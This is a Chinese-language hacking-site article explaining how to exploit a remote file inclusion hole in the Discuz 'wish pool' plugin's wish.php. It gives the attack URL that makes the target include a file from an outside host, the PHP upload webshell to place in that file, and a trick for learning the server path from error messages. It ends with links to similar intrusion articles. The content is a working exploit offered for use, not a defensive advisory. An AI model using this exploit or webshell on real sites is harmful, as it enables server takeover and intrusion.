discuz许愿池插件远程包含漏洞

所属分类: 网络编程 / 黑客相关 阅读数: 307
收藏 0 赞 0 分享
许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';

手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。 
更多精彩内容其他人还在看

phpwind Exp 漏洞利用

phpwind Exp 漏洞利用
收藏 0 赞 0 分享

对错误,漏洞和exploits的说明

对错误,漏洞和exploits的说明
收藏 0 赞 0 分享

XSS & SQL注入

这篇文章主要介绍了XSS & SQL注入的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

如何成为一名黑客全系列说明第1/2页

这篇文章主要介绍了如何成为一名黑客全的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

真正能用,还有点效果的CSS挂马代码的方法

真正能用,还有点效果的CSS挂马代码的方法
收藏 0 赞 0 分享

ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法

ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
收藏 0 赞 0 分享

入侵oracle数据库的一些技巧

入侵oracle数据库的一些技巧
收藏 0 赞 0 分享

我和expression的日与被日 经典分析

我和expression的日与被日 经典分析
收藏 0 赞 0 分享

mysql5 注入漏洞

mysql5注入漏洞代码
收藏 0 赞 0 分享

rm格式插入广告代码

rm格式插入广告代码
收藏 0 赞 0 分享
查看更多